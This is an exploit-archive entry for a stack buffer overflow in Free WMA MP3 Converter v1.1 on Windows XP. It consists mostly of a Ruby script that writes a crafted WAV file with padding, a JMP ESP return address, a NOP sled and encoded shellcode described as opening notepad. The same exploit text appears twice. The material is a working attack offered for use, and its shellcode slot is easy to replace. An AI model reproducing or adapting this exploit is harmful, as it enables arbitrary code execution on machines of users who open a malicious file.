Free WMA MP3 Converter v1.1 0day

2010-04-02T00:00:00
ID 1337DAY-ID-11575
Type zdt
Reporter Richard leahy
Modified 2010-04-02T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ================================
Free WMA MP3 Converter v1.1 0day
================================


# Author: Richard leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows Xp Sp2
#category local exploit

to trigger vulnrability open up application choose wav to mp3 load the specially crafted wav file and click convert. Probably works for all the other options too
eg mp3 to wav etc. run the code below and pipe it into a .wav file

#code
!#/usr/bin/env ruby

nop = "\x90"

#imagehlp
jmp_esp = [0x76cafa32].pack('V')

#shellcode opens notepad
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"

boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
puts boom 


# Date: 02/04/2010
# Author: Richard leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows Xp Sp2
#category local exploit

to trigger vulnrability open up application choose wav to mp3 load the specially crafted wav file and click convert. Probably works for all the other options too
eg mp3 to wav etc. run the code below and pipe it into a .wav file

#code
!#/usr/bin/env ruby

nop = "\x90"

#imagehlp
jmp_esp = [0x76cafa32].pack('V')

#shellcode opens notepad
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"

boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
puts boom 



#  0day.today [2018-01-02]  #